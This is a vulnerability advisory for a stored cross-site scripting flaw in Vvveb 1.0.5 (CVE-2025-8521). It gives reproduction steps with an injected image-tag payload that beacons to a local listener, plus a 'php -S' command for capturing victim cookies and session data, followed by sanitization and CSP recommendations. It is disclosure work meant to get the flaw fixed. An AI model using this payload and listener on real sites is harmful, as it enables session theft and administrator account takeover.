DELTA OBSCURA

We are the team behind Mission Cyber Sentinel, a mission dedicated to securing 446,000 digital assets globally.

GitHub

Vvveb - v1.0.5 - Cross-Site Scripting via navbar

By 0xhamy 04:58 PM - October 22nd 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor givanz
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Cross-Site Scripting
Severity High
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score 8.7
CVE ID CVE-2025-8521
Vendor Acknowledgement Yes
Affected digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Credit 0xhamy

Description

Vvveb 1.0.5 is vulnerable to stored, site-wide cross-site scripting (XSS) via the admin settings at /vadmin123/index.php?module=settings/post-types.
Malicious HTML/JS injected into the Post Type “type” field is persisted and subsequently executed across all admin panel pages under /vadmin123/ whenever users view them. Attackers with a logged-in admin-level role (e.g., Site Administrator, Administrator, or Super Administrator) can leverage this to silently steal sessions and perform actions as other administrators; a lower-privileged admin can escalate to Super Administrator by hijacking their session.

Vulnerability Details

The Post Types configuration accepts unsanitized input for post_type[type]. The stored payload renders within admin views, executing in the Vvveb origin for any authenticated admin who visits the panel. Because execution occurs in privileged contexts, the payload can exfiltrate cookies/session tokens and issue authenticated API requests, impacting multiple roles (admins, editors, vendors, etc.) panel-wide.

Steps to Reproduce

  1. Log in with an admin-capable role.
    Use an account with Site Administrator, Administrator, or Super Administrator privileges.

  2. Open Post Types settings.
    Navigate to:

    /vadmin123/index.php?module=settings/post-types

  3. Insert a stored XSS payload.
    Click Add type. In the field name="post_type[type]", input:

    "><img src="http://127.0.0.1:1718/capture.php">

    (Example payload beacons to a listener; replace with your test endpoint.)

  4. Trigger across the admin panel.
    Visit any admin page under /vadmin123/. The payload executes on view, enabling silent cookie/session theft and authenticated actions as the victim.

  5. (Optional) Listener setup for verification.
    Use the PHP capture script from your gist and run:

    php -S 0.0.0.0:1718

    Observe inbound requests with victim cookies/session data.

Recommendation

  • Sanitize admin-configurable fields with an allow-list HTML sanitizer; strip scripts, event handlers, and dangerous attributes.
  • Encode on render in admin views (treat configuration values as text unless explicitly needed and safe).
  • Harden CSP (disallow inline scripts; restrict img-src/connect-src to trusted domains).
  • Add role-based approvals or preview workflows for settings that influence global admin UI rendering.